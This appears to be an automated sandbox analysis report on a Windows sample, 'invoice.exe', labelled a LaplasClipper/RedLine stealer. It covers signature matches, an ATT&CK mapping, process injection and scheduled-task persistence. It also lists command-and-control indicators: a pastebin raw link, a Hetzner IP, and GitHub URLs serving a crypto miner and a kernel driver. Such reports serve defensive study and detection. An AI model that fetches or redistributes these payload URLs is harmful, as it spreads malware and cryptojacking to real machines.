                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.9.dr -- Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.9.dr -- Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.9.dr -- Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.9.dr -- Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match -- File source: 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match -- File source: 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match -- File source: 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match -- File source: Process Memory Space: 4usfliof.exe PID: 4520, type: MEMORYSTR
                  Source: Yara match -- File source: Process Memory Space: RegSvcs.exe PID: 732, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match -- File source: 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match -- File source: 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara match -- File source: 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match -- File source: Process Memory Space: 4usfliof.exe PID: 4520, type: MEMORYSTR
                  Source: Yara match -- File source: Process Memory Space: RegSvcs.exe PID: 732, type: MEMORYSTR

MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count of signatures mapped to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 21 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Launchd; Scheduled Task
Persistence: 1 Windows Service; 1 Scheduled Task/Job; 1 Scripting; 1 DLL Side-Loading; Network Logon Script; RC Scripts
Privilege Escalation: 1 Windows Service; 311 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Network Logon Script; RC Scripts
Defense Evasion: 1 Disable or Modify Tools; 61 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 141 Security Software Discovery; 1 Process Discovery; 61 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Non-Standard Port; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1504580, Sample: invoice.exe, Startdate: 05/09/2024, Architecture: WINDOWS, Score: 100)

Sample-level signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 11 other signatures.
Contacted domains: pastebin.com (Connects to a pastebin service (likely for C&C)); github.com.

Process tree:
- invoice.exe (started)
  - dropped: C:\Users\user\AppData\...\yee9mbi69cm7.exe (PE32); C:\Users\user\AppData\Local\...\4usfliof.exe (PE32)
  - cmd.exe (started); signatures: Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules
    - yee9mbi69cm7.exe (started); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
      - RegSvcs.exe (started); signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
        - AppLaunch.exe (started); network: pastebin.com 172.67.19.24, 443, 49737 (CLOUDFLARENETUS, United States); github.com 140.82.121.3, 443, 49739, 49740 (GITHUBUS, United States); dropped: C:\ProgramData\HostData\logs.uce (ASCII); signature: Sample is not signed and drops a device driver
          - cmd.exe (started); signature: Encrypted powershell cmdline option found
            - powershell.exe (started); signature: Loading BitLocker PowerShell Module
              - WmiPrvSE.exe (started)
            - conhost.exe (started)
          - cmd.exe (started)
            - conhost.exe (started)
            - schtasks.exe (started)
          - cmd.exe (started)
            - conhost.exe (started)
            - schtasks.exe (started)
        - conhost.exe (started)
      - WerFault.exe (started)
      - RegSvcs.exe (started)
    - 4usfliof.exe (started); signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
      - RegSvcs.exe (started); network: 135.181.7.171, 49730, 49750, 49752 (HETZNER-ASDE, Germany)
      - WerFault.exe (started)
    - conhost.exe (started)
    - cmd.exe (started)

Source | Detection | Scanner | Label
invoice.exe | 61% | ReversingLabs | Win32.Trojan.LaplasClipper
invoice.exe | 100% | Avira | TR/AD.RedLineSteal.lbwzb
invoice.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | 100% | Avira | HEUR/AGEN.1317024
C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | 83% | ReversingLabs | Win32.Trojan.LaplasClipper
C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | 88% | ReversingLabs | Win32.Trojan.LaplasClipper
                  No Antivirus matches
                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.3 | true | false | | unknown
pastebin.com | 172.67.19.24 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe | false | Avira URL Cloud: safe | unknown
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id6LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/trendingAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys&quot;AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://pastebin.comAppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id5ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.github.com/_private/browser/errorsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/light-3e154969b9f9.cssAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id10ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id8ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id22LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/features/discussionsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://partner.github.comAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/favicons/favicon.pngAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/github-elements-508a45ca23c6.jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sysChttps://pastebin.com/raw/PTNbBXRegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id19LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id7LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id11LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/features/copilotAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id13ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/light_tritanopia-31d17ba3e139.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.comDAppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nodAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/favicons/favicon.svgAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/ui_packages_onfocus_onfocus_ts-ui_packages_trusted-types-poliAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/github-e4eed26e112b.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id22ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/features/codespacesAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://github.comdAppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/environment-924e60bca7d2.jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.comAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Entity/Id8LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/collectionsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
